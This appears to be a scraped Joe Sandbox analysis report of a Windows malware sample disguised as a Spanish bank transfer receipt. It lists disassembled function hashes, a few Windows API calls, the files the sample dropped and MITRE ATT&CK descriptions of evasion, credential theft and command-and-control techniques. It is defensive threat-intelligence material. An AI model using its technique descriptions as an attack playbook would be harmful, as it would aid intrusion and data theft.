Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406B17 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406D18 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406533 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406981 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9F Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004069EB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405B54 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96

Memory Dump Source

Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report comprobante de transferencia.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Fjeldklftens38.bio

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Gaudiest.pre

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Morel.Off24

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Renoveringers\Buddhisme\Indordningers207\Faultiest\gagers.rec

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Rygklappers.Bly

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Undervisningsform.bek

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\floddeltaets.mar

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\kannevasen.txt

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
comprobante de transferencia.exe

Function 0040326A Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 401
stringfilecomCOMMON

Function 004052B8 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Function 0040580B Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00405648 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Function 00403C06 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Function 00403863 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 0040603C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Function 00406384 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Function 00405C1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre